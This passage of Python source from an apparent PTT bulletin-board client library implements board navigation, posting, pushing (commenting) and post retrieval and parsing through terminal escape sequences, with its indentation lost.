self.__ErrorCode = ErrCode
return ErrCode, result
AllIndex = list(set(map(int, AllIndex)))
AllIndex.sort(reverse=True)
# print(AllIndex)
for IndexTemp in AllIndex:
# Check whether the numbers are consecutive; only post indexes can be consecutive
isContinue = True
for i in range(1, 3):
if str(IndexTemp - i) not in self.__ReceiveData[ConnectIndex]:
isContinue = False
break
if isContinue:
result = IndexTemp
break
if result == 0:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
# Check for misjudgment caused by the previous post ending with a number
for i in range(1, 20):
if str(result + 1) in self.__ReceiveData[ConnectIndex]:
result += 1
else:
break
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 ' + str(result) + '\rQ'
Refresh = True
isBreakDetect = False
# The order of this list determines detection priority
DetectTargetList = [
DetectUnit(
'取得可閱讀文章',
'文章代碼',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得可閱讀文章',
'文章網址',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得可閱讀文章',
'這一篇文章值',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'請按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.UnknowError
),
PTTBUGDetectUnit
]
ShowFixResult = False
for TryResult in range(result, result - 100, -1):
FindResult = False
#self.Log('Try: ' + Board + ' ' + str(TryResult))
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 ' + str(TryResult) + '\rQ'
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
if ShowFixResult:
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if result != TryResult:
if ShowFixResult:
self.Log('修正結果為 ' + str(TryResult), LogLevel.DEBUG)
result = TryResult
FindResult = True
else:
ShowFixResult = True
break
if not isDetectedTarget:
continue
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
if FindResult:
break
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def post(self, Board, Title, Content, PostType, SignType):
ConnectIndex = 0
self.__IdleTime = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
Title = str(Title)
Content = str(Content)
PostType = int(PostType)
SignType = int(SignType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
# Navigate to the board
self.__APILock[ConnectIndex].acquire()
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
CatchList = [
# 0
'文章選讀',
]
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == -1:
self.Log('前進至 ' + Board + '板失敗')
print(self.__ReceiveData[ConnectIndex])
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
# Check whether we have permission to post
CatchList = [
# 0
'或不選',
# 1
'使用者不可發言',
]
SendMessage = '\x10'
Refresh = False
ExtraWait = 0
Retry = False
RetryCount = 0
while True:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = ' '
Refresh = False
ExtraWait = 0
if CatchIndex == 0:
self.Log('具備發文權限', LogLevel.DEBUG)
break
elif CatchIndex == 1:
self.Log('你被水桶惹 QQ')
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = str(PostType) + '\r' + str(Title) + '\r' + str(Content) + '\x18'
self.Log('送出文章', LogLevel.DEBUG)
Refresh = True
ExtraWait = 0
CatchList = [
# 0
'確定要儲存檔案嗎',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('儲存檔案', LogLevel.DEBUG)
SendMessage = 's\r'
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = [
# 0
'任意鍵繼續',
# 1
'x=隨機',
# 2
'文章選讀',
]
Refresh = True
ExtraWait = 0
while True:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
break
elif CatchIndex == 1:
self.Log('選擇簽名檔: ' + str(SignType), LogLevel.DEBUG)
SendMessage = str(SignType) + '\r'
elif CatchIndex == 2:
break
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
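# A hedged example of posting with the method above (board, title, content,
# post type and signature index are assumptions):
#
#   ErrCode = ptt.post('Test', 'PTTLibrary test post', 'test content', 1, 0)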
def push(self, Board, inputPushType, PushContent, PostID='', PostIndex=0):
self.__IdleTime = 0
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
inputPushType = int(inputPushType)
PushContent = str(PushContent)
PostID = str(PostID)
PostIndex = int(PostIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
MaxPushLength = 45
self.__PushShow = False
PushList = []
Temp = ''
TempStartIndex = 0
TempEndIndex = TempStartIndex + 1
while TempEndIndex <= len(PushContent):
Temp = ''
while len(Temp.encode('big5')) < MaxPushLength:
Temp = PushContent[TempStartIndex:TempEndIndex]
if not len(Temp.encode('big5')) < MaxPushLength:
break
elif PushContent.endswith(Temp):
break
TempEndIndex += 1
PushList.append(Temp)
TempStartIndex = TempEndIndex
TempEndIndex = TempStartIndex + 1
self.__APILock[ConnectIndex].acquire()
for Push in PushList:
# print('Push:', Push)
ErrCode = self.__push(Board, inputPushType, Push, PostID=PostID, PostIndex=PostIndex)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
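# A hedged example of pushing (commenting) on a post with the method above
# (board, content and post index are assumptions):
#
#   ErrCode = ptt.push('Test', PushType.Push, 'test push', PostIndex=1)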
def __push(self, Board, inputPushType, PushContent, PostID='', PostIndex=0):
ConnectIndex = 0
SendMessage = ''
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
# Navigate to the board
SendMessage += '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
# Navigate to the post
if PostID != '':
SendMessage += '#' + PostID + '\r'
else:
SendMessage += str(PostIndex) + '\r'
# Check whether we have permission to push (comment)
SendMessage += 'X'
CatchList = [
# 0
'您覺得這篇文章',
# 1
'禁止快速連續推文',
# 2
'禁止短時間內大量推文',
# 3
'使用者不可發言',
# 4
'加註方式',
# 5
'◆ 本文已刪除',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('具備推文權限', LogLevel.DEBUG)
if '值得推薦' in self.__ReceiveData[ConnectIndex]:
Push = True
else:
Push = False
if '給它噓聲' in self.__ReceiveData[ConnectIndex]:
Boo = True
else:
Boo = False
if '→註解' in self.__ReceiveData[ConnectIndex]:
Arrow = True
else:
Arrow = False
if inputPushType == PushType.Push:
if not Push:
inputPushType = PushType.Arrow
elif inputPushType == PushType.Boo:
if not Boo:
inputPushType = PushType.Arrow
elif inputPushType == PushType.Arrow:
if not Arrow:
inputPushType = PushType.Push
else:
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.Log('準備推文')
SendMessage = str(inputPushType) + str(PushContent) + '\ry\r'
elif CatchIndex == 1:
self.Log('禁止快速推文')
ErrCode = ErrorCode.NoFastPush
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 2:
self.Log('禁止機器人快速推文')
ErrCode = ErrorCode.NoFastPush
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 3:
self.Log('你被水桶惹 QQ')
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
elif CatchIndex == 4:
if not self.__PushShow:
self.Log('作者本人使用箭頭')
self.__PushShow = True
SendMessage = str(PushContent) + '\ry\r'
elif CatchIndex == 5:
self.Log('文章已經被刪除')
ErrCode = ErrorCode.PostDeleted
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = []
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
# print(self.__ReceiveData[ConnectIndex])
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def getPost(self, Board, PostID='', PostIndex=0, _ConnectIndex=0, SearchType=0, Search=''):
self.__IdleTime = 0
ConnectIndex = _ConnectIndex
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
Board = str(Board)
PostID = str(PostID)
PostIndex = int(PostIndex)
SearchType = int(SearchType)
Search = str(Search)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if SearchType < PostSearchType.MinValue or PostSearchType.MaxValue < SearchType:
self.Log('搜尋類型輸入錯誤: 無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
if (Search != '' and SearchType == PostSearchType.Unknow) or (Search == '' and SearchType != PostSearchType.Unknow):
self.Log('無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
if PostID != '' and Search != '':
self.Log('使用文章代碼取得文章 搜尋條件失效', LogLevel.WARNING)
Search = ''
if SearchType == PostSearchType.Keyword:
pass
elif SearchType == PostSearchType.Author:
pass
elif SearchType == PostSearchType.Push:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋推文數 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Mark:
if Search != 'm' and Search != 's':
self.Log('搜尋條件輸入錯誤: 搜尋標記 但搜尋條件非 m 或 s 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Money:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋稿酬 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
self.__APILock[ConnectIndex].acquire()
for i in range(3):
ErrCode, Post = self.__getPost(Board, PostID, PostIndex, _ConnectIndex, SearchType, Search)
if ErrCode == ErrorCode.PostDeleted:
if Post == None:
continue
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
if ErrCode != ErrorCode.Success:
continue
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, Post
def __parsePush(self, line):
# print('__parsePush line: ' + line)
ErrCode = ErrorCode.Success
CurrentPush = None
line = line.lstrip()
CurrentPushType = PushType.Unknow
if line.startswith('推'):
CurrentPushType = PushType.Push
elif line.startswith('噓'):
CurrentPushType = PushType.Boo
elif line.startswith('→'):
CurrentPushType = PushType.Arrow
if CurrentPushType == PushType.Unknow:
return ErrorCode.ParseError, None
PushAuthor = line
PushAuthor = PushAuthor[2:]
PushAuthor = PushAuthor[:PushAuthor.find(':')]
while PushAuthor.endswith(' '):
PushAuthor = PushAuthor[:-1]
Target = ': '
PushContent = line[:-11]
PushContent = PushContent[PushContent.find(Target) + len(Target):]
PushContent = PushContent.rstrip()
PushIP = None
IPIndex_start = PushContent.rfind(' ') + 1
IPTemp = PushContent[IPIndex_start:]
IPCheck = re.search(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", IPTemp)
# Validate the IP format and its distance from the colon (> 10) to avoid mistaking an IP inside the push content for the push IP
if IPCheck != None and (PushContent.find(IPCheck.group()) - PushContent.find(': ') > 10):
PushIP = IPCheck.group()
PushContent = PushContent[:PushContent.find(PushIP)]
PushContent = PushContent.rstrip()
PushTime = line[-11:]
if re.search("[0-9][0-9]:[0-9][0-9]", PushTime) == None:
return ErrorCode.ParseError, None
if re.search("[0-9][0-9]/[0-9][0-9]", PushTime) == None:
return ErrorCode.ParseError, None
# print('PushAuthor: =' + PushAuthor + '=')
# print('PushContent: =' + PushContent + '=')
# print('PushTime: =' + PushTime + '=')
CurrentPush = Information.PushInformation(CurrentPushType, PushAuthor, PushContent, PushIP, PushTime)
return ErrCode, CurrentPush
def __getPost(self, Board, PostID='', PostIndex=0, _ConnectIndex=0, SearchType=0, Search=''):
ConnectIndex = _ConnectIndex
result = None
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
# Navigate to the post
if PostID != '':
SendMessage += '#' + PostID + '\rQ'
elif PostIndex != -1:
if Search != '':
if SearchType == PostSearchType.Keyword:
SendMessage += '/' + Search + '\r'
elif SearchType == PostSearchType.Author:
SendMessage += 'a' + Search + '\r'
elif SearchType == PostSearchType.Push:
SendMessage += 'Z' + Search + '\r'
elif SearchType == PostSearchType.Mark:
SendMessage += 'G' + Search + '\r'
elif SearchType == PostSearchType.Money:
SendMessage += 'A' + Search + '\r'
SendMessage += str(PostIndex) + '\rQ'
Refresh = True
isBreakDetect = False
# The order of this list determines detection priority
DetectTargetList = [
DetectUnit(
'取得文章',
'請按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得文章',
'這一篇文章值',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'取得文章',
'文章代碼(AID):',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'遇到 PTT BUG!!',
'PttBug',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.PttBug
),
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, None
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), LogLevel.DEBUG)
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if ErrCode == ErrorCode.PttBug:
self.__connectRemote(ConnectIndex)
self.__ErrorCode = ErrCode
return ErrCode, None
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
for line in self.__ReceiveData[ConnectIndex].split('\n'):
# 78369 10/08 - □ (本文已被刪除) [QQ1]
# 77579 s 10/06 - □ (本文已被刪除) <QQ2>
if line.startswith(self.__Cursor):
CheckDeleteList = ['本文', '已被', '刪除', '吃掉']
CheckDeleteResult = [False] * len(CheckDeleteList)
for i in range(len(CheckDeleteList)):
DeletedKeyword = CheckDeleteList[i]
if DeletedKeyword in line:
CheckDeleteResult[i] = True
if CheckDeleteResult.count(True) >= 2:
# print('deleted line: ' + line)
if '<' in line:
PostAuthor = line[line.find('<') + 1:]
PostAuthor = PostAuthor[:PostAuthor.find('>')]
# print('被版主刪除兒: >' + PostAuthor + '<')
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByModerator)
elif '[' in line:
PostAuthor = line[line.find('[') + 1:]
PostAuthor = PostAuthor[:PostAuthor.find(']')]
# print('自己刪除兒: >' + PostAuthor + '<')
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
else:
# print('無法判斷誰刪除: ' + line)
FakeAuthor = line
FakeAuthor = FakeAuthor[FakeAuthor.find(') ') + 2:]
FakeAuthor = FakeAuthor[:FakeAuthor.find(']')]
# print('FakeAuthor: ' + FakeAuthor)
RawData = self.__ReceiveRawData[ConnectIndex].decode(encoding='big5',errors='ignore')
if '[H' + FakeAuthor + ']' in RawData:
# print('Author: H' + FakeAuthor)
PostAuthor = 'H' + FakeAuthor
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
if '[m' + FakeAuthor + ']' in RawData:
# print('Author: m' + FakeAuthor)
PostAuthor = 'm' + FakeAuthor
result = Information.PostInformation(Board=Board, Author=PostAuthor, DeleteStatus=PostDeleteStatus.ByAuthor)
ErrCode = ErrorCode.PostDeleted
self.__ErrorCode = ErrCode
return ErrCode, result
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
Lines = self.__ReceiveData[ConnectIndex].split('\n')
InfoLines = []
for Line in Lines:
# print('line: ' + Line)
if Line.startswith('│'):
# print('InfoLines: ' + Line)
InfoLines.append(Line)
if len(InfoLines) != 3:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
Target = '#'
PostID = InfoLines[0]
PostID = PostID[PostID.find(Target) + len(Target):]
PostID = PostID[:PostID.find(' ')]
while PostID.endswith(' '):
PostID = PostID[:-1]
Target = '文章網址: '
PostWeb = InfoLines[1]
PostWeb = PostWeb[PostWeb.find(Target) + len(Target):]
PostWeb = PostWeb[:PostWeb.find(' ')]
while PostWeb.endswith(' '):
PostWeb = PostWeb[:-1]
try:
if '特殊文章,無價格記錄' in InfoLines[2]:
PostMoney = -1
else:
PostMoney = int(re.search(r'\d+', InfoLines[2]).group())
except:
PostMoney = -1
self.Log('取得文章價錢失敗: ' + InfoLines[2], LogLevel.DEBUG)
# self.Log('PostID: =' + PostID + '=')
# self.Log('PostTitle: =' + PostTitle + '=')
# self.Log('PostWeb: =' + PostWeb + '=')
# self.Log('PostMoney: =' + str(PostMoney) + '=')
SendMessage = '\r\r'
Refresh = True
isBreakDetect = False
# The order of this list determines detection priority
DetectTargetList = [
DetectUnit(
'文章讀取完成',
'(100%) 目前',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'文章讀取完成',
'頁 (100%)',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示: 第',
ResponseUnit('', True),
),
DetectUnit(
'',
'瀏覽 第',
ResponseUnit('', True),
),
DetectUnit(
'運作出錯',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.ParseError
),
DetectUnit(
'運作出錯',
'任意鍵',
ResponseUnit('', True),
BreakDetect=True,
ErrCode = ErrorCode.ParseError
),
PTTBUGDetectUnit
]
FirstPage = ''
PageIndex = 2
LastPageIndex = 0
PostContentListTemp = []
PostRawContentListTemp = []
isFirstPage = True
PostIP = ''
NewLine, _ = uao.encode('\n')
NewLineByte = NewLine[0]
ControlCodeMode = False
FirstControlCodePage = True
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, None
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
if FirstPage == '':
FirstPage = self.__ReceiveData[ConnectIndex]
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
if len(PostIP) == 0:
PostIP = re.findall( r'[0-9]+(?:\.[0-9]+){3}', self.__ReceiveData[ConnectIndex])
if len(PostIP) > 0:
PostIP = PostIP[0]
CurrentPage = self.__ReceiveData[ConnectIndex]
CurrentRawPage = self.__ReceiveRawData[ConnectIndex]
CurrentPageList = CurrentPage.split('\n')
CurrentRawPageList = CurrentRawPage.split('\n')
PageLineRangeTemp = CurrentPageList.pop()
CurrentRawPageList.pop()
PageLineRange = re.findall(r'\d+', PageLineRangeTemp)
if len(PageLineRange) <= 3:
if not ControlCodeMode:
# print(PageIndex)
self.Log('控制碼擷取文章模式啟動', _LogLevel=LogLevel.DEBUG)
FirstControlCodePage = True
ControlCodeMode = True
if not ControlCodeMode:
PageLineRange = list(map(int, PageLineRange))[-2:]
# OverlapLine = LastPageIndex - PageLineRange[0] + 1
AppendLine = PageLineRange[1] - LastPageIndex
if AppendLine > 0 and LastPageIndex != 0:
# ShowTarget = '洗髮用品、洗臉卸粧用品、沐浴用品、香皂類'
# if ShowTarget in CurrentPage:
# print(CurrentPageList)
# print(len(CurrentPageList))
# print('附加', AppendLine, '行')
# print(CurrentPageList[-AppendLine:])
CurrentPageList = CurrentPageList[-AppendLine:]
CurrentRawPageList = CurrentRawPageList[-AppendLine:]
# if not isFirstPage:
# for i in range(OverlapLine):
# for ii in range(len(CurrentRawPage)):
# if CurrentRawPage[ii] == NewLineByte:
# CurrentRawPage = CurrentRawPage[ii + 1:]
# break
LastPageIndex = PageLineRange[1]
PostContentListTemp.extend(CurrentPageList)
PostRawContentListTemp.extend(CurrentRawPageList)
else:
if FirstControlCodePage:
OverlapLine = 0
for i in range(len(CurrentPageList)):
# print('FirstControlCodePage: ' + CurrentPageList[i])
if CurrentPageList[i] in PostContentListTemp:
# print('!!!OverlapLine: ' + CurrentPageList[i])
OverlapLine = i + 1
CurrentPageList = CurrentPageList[OverlapLine:]
CurrentRawPageList = CurrentRawPageList[OverlapLine:]
FirstControlCodePage = False
PostContentListTemp.extend(CurrentPageList)
PostRawContentListTemp.extend(CurrentRawPageList)
else:
if not CurrentPageList[-3] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-3])
PostContentListTemp.append(CurrentPageList[-3])
PostRawContentListTemp.append(CurrentRawPageList[-3])
if not CurrentPageList[-2] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-2])
PostContentListTemp.append(CurrentPageList[-2])
PostRawContentListTemp.append(CurrentRawPageList[-2])
if not CurrentPageList[-1] in PostContentListTemp:
# print('ControModeLine: ' + CurrentPageList[-1])
PostContentListTemp.append(CurrentPageList[-1])
PostRawContentListTemp.append(CurrentRawPageList[-1])
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not ControlCodeMode:
SendMessage = str(PageIndex) + '\r'
PageIndex += 1
else:
SendMessage = MoveDownCommand
Refresh = True
isFirstPage = False
break
if not isDetectedTarget:
if len(self.__ReceiveData[ConnectIndex]) < 500:
pass
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
FirstPage = FirstPage[FirstPage.find('作者'):]
PostLineList = FirstPage.split('\n')
# if len(PostLineList) < 3:
# ErrCode = ErrorCode.ParseError
# self.__ErrorCode = ErrCode
# return ErrCode, None
# for line in PostLineList:
# print('Q', line)
Target = '作者 '
if Target in FirstPage:
PostAuthor = PostLineList[0]
PostAuthor = PostAuthor[PostAuthor.find(Target) + len(Target):]
PostAuthor = PostAuthor[:PostAuthor.find(')') + 1]
PostAuthor = PostAuthor.rstrip()
else:
PostAuthor = None
Target = '標題 '
if Target in FirstPage:
PostTitle = PostLineList[1]
PostTitle = PostTitle[PostTitle.find(Target) + len(Target):]
PostTitle = PostTitle[:PostTitle.find('\r')]
PostTitle = PostTitle.rstrip()
else:
PostTitle = None
Target = '時間 '
if Target in FirstPage:
PostDate = PostLineList[2]
PostDate = PostDate[PostDate.find(Target) + len(Target):]
PostDate = PostDate[:PostDate.find('\r')]
PostDate = PostDate.rstrip()
else:
PostDate = None
PostContentList = []
PostPushList = []
LastPostEndMarkIndex = 0
for i in range(len(PostContentListTemp)):
line = PostContentListTemp[i]
if '※' in line and ('發信站' in line or '批踢踢實業坊' in line):
LastPostEndMarkIndex = i
for i in range(len(PostContentListTemp)):
line = PostContentListTemp[i]
PostContentList.append(line)
if i > LastPostEndMarkIndex:
_, CurrentPush = self.__parsePush(line)
if CurrentPush != None:
PostPushList.append(CurrentPush)
PostContent = '\n'.join(PostContentList)
PosRawData = '\n'.join(PostRawContentListTemp)
# self.Log('PostContent: =' + PostContent + '=')
# self.Log('PostIP: =' + PostIP + '=')
        result = Information.PostInformation(Board, PostID, PostAuthor, PostDate, PostTitle, PostWeb, PostMoney, PostContent, PostIP, PostPushList, PosRawData, DeleteStatus=PostDeleteStatus.NotDeleted)
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, result
